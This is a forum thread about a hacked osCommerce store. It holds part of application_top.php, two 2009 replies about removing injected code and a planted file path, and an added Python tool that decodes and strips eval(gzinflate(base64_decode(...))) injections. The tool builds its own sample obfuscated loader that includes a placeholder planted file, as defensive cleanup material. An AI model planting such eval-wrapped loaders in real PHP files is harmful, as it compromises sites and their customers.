    $manufacturers_query = tep_db_query("select manufacturers_name from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'");
    if (tep_db_num_rows($manufacturers_query)) {
      $manufacturers = tep_db_fetch_array($manufacturers_query);
      $breadcrumb->add($manufacturers['manufacturers_name'], tep_href_link(FILENAME_DEFAULT, 'manufacturers_id=' . $HTTP_GET_VARS['manufacturers_id']));
    }
  }

// add the products model to the breadcrumb trail
  if (isset($HTTP_GET_VARS['products_id'])) {
    $model_query = tep_db_query("select products_model from " . TABLE_PRODUCTS . " where products_id = '" . (int)$HTTP_GET_VARS['products_id'] . "'");
    if (tep_db_num_rows($model_query)) {
      $model = tep_db_fetch_array($model_query);
      $breadcrumb->add($model['products_model'], tep_href_link(FILENAME_PRODUCT_INFO, 'cPath=' . $cPath . '&products_id=' . $HTTP_GET_VARS['products_id']));
    }
  }

// initialize the message stack for output messages
  require(DIR_WS_CLASSES . 'message_stack.php');
  $messageStack = new messageStack;

// set which precautions should be checked
  define('WARN_INSTALL_EXISTENCE', 'true');
  define('WARN_CONFIG_WRITEABLE', 'true');
  define('WARN_SESSION_DIRECTORY_NOT_WRITEABLE', 'true');
  define('WARN_SESSION_AUTO_START', 'true');
  define('WARN_DOWNLOAD_DIRECTORY_NOT_READABLE', 'true');

// {{ buySAFE Module
  if ($cart->count_contents() > 0) {
    require(DIR_WS_CLASSES . 'buysafe.php');
    $buysafe_module = new buysafe_class;
    $WantsBond = ($HTTP_POST_VARS['WantsBond'] ? $HTTP_POST_VARS['WantsBond'] : $HTTP_SESSION_VARS['WantsBond']);
    $buysafe_cart_id = MODULE_BUYSAFE_BUYSAFE_CART_PREFIX . '-' . tep_session_id() . tep_count_customer_orders();
    $buysafe_params = array('WantsBond' => ($WantsBond ? $WantsBond : 'false'), 'buysafe_cart_id' => $buysafe_cart_id);
    $buysafe_result = $buysafe_module->call_api('AddUpdateShoppingCart', $buysafe_params);
    // print_r($buysafe_result);
    if (is_array($buysafe_result)) {
      global $buysafe_result;
      tep_session_register('WantsBond');
      if (tep_not_null($buysafe_result['faultstring'])) {
        if (strstr($buysafe_result['faultstring'], 'timed out')) {
          tep_db_query("update " . TABLE_CONFIGURATION . " set configuration_value = (now() + interval 1 hour) where configuration_key = 'MODULE_BUYSAFE_BUYSAFE_STOP_API_CALLS_TIME'");
        }
        // $messageStack->add('header', 'buySAFE fault: ' . $buysafe_result['faultstring'], 'error');
      }
    }
  }
// }}

  require_once(DIR_WS_CLASSES . 'preventDuplicates.php');
  $preventDuplicates = new preventDuplicates();
?>
♥FIMBLE Posted December 28, 2009 (Author)

Hi,

Add it after this line:

require(DIR_WS_INCLUDES . 'filenames.php');

You also need to get rid of the hack code at the top of your file.

Nic
♥FIMBLE Posted December 28, 2009 (Author)

Decoded the encrypted code to find where the additional files have been added; its location is here:

/home/rjrdisco/public_html/backup/phpforms/cnk-admin/idx/display/sections/advanced/style.css.php

Nic
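An added example of the step Nic describes in his two posts above (the "hack code at the top of your file" and decoding it to see which extra file it pulls in). This is my own helper, not the contribution's code and not anything posted in the thread. It finds an eval()-wrapped injection in a PHP file, peels the encoding layers PHP would apply (base64_decode, gzinflate and a few others), lists the files the decoded payload includes, and strips the eval() statement. The sample file contents, the two-layer nesting and the planted path are constructed for the example; the path is a placeholder, not the one reported in the thread.

```python
"""Locate an eval()-wrapped PHP injection, peel its encoding layers, and list
the files it includes. Added example for the thread; not the contribution's code."""
import base64
import codecs
import re
import zlib

# Decoders for the PHP wrapper functions attackers commonly nest inside eval().
# Each maps bytes to bytes. PHP's gzinflate() is a raw (headerless) inflate.
WRAPPERS = {
    "base64_decode": lambda b: base64.b64decode(b),
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": lambda b: zlib.decompress(b),
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# eval( f1( f2( ... 'literal' ) ... ) ); with the outermost wrapper first
EVAL_RE = re.compile(
    r"eval\s*\(\s*((?:[A-Za-z0-9_]+\s*\(\s*)+)(['\"])(.*?)\2\s*\)+\s*;?",
    re.DOTALL,
)
# include/require of a literal path inside a decoded payload
INCLUDE_RE = re.compile(r"(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]")


def peel(chain: str, literal: str) -> bytes:
    """Apply the wrapper chain innermost-first, the order PHP would evaluate it."""
    names = re.findall(r"[A-Za-z0-9_]+", chain)
    data = literal.encode("latin-1")
    for name in reversed(names):
        if name not in WRAPPERS:
            raise ValueError(f"unsupported wrapper: {name}()")  # never guess silently
        data = WRAPPERS[name](data)
    return data


def decode_layers(code: str, max_depth: int = 8) -> list:
    """Peel nested eval() layers; returns each decoded layer as text, outermost first."""
    layers = []
    m = EVAL_RE.search(code)
    while m and len(layers) < max_depth:
        code = peel(m.group(1), m.group(3)).decode("latin-1")
        layers.append(code)
        m = EVAL_RE.search(code)
    return layers


def find_injections(source: str) -> list:
    """One record per eval() injection: line number, decoded layers, files it includes."""
    hits = []
    for m in EVAL_RE.finditer(source):
        layers = decode_layers(m.group(0))
        files = sorted({f for layer in layers for f in INCLUDE_RE.findall(layer)})
        hits.append({"line": source.count("\n", 0, m.start()) + 1,
                     "layers": layers, "files": files})
    return hits


def strip_injections(source: str) -> str:
    """Remove the eval() statements only; the files they include still need deleting."""
    return EVAL_RE.sub("", source)


def _deflate(data: bytes) -> bytes:
    """Raw deflate, matching PHP's gzdeflate(), used only to build the sample."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


# Constructed sample (not the thread's file): the first lines of a compromised
# application_top.php. The planted path is a placeholder chosen for this example.
PLANTED_PATH = "/var/www/html/backup/old-forms/style.css.php"
_payload = f"@include_once('{PLANTED_PATH}');"
_inner = "eval(gzinflate(base64_decode('" + base64.b64encode(_deflate(_payload.encode())).decode() + "')));"
_outer = "eval(base64_decode('" + base64.b64encode(_inner.encode()).decode() + "'));"
SAMPLE_SOURCE = (
    "<?php " + _outer + " ?>\n"
    "<?php\n"
    "/* application_top.php: legitimate code follows */\n"
    "require(DIR_WS_INCLUDES . 'filenames.php');\n"
)

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_SOURCE):
        print(f"line {hit['line']}: {len(hit['layers'])} layer(s) decoded")
        for path in hit["files"]:
            print("  pulls in:", path)
```

Run it against a copy of the file, never the live one, and do not execute anything it decodes. Removing the eval() line is only half the cleanup: delete the planted file, restore application_top.php from a known-good copy, and find out how the attacker got write access (FTP credentials, a writable backup directory) or the injection will come back. The wrapper table covers only the common functions; an unknown wrapper raises rather than being skipped, so a chain you have not seen is reported instead of silently left in place.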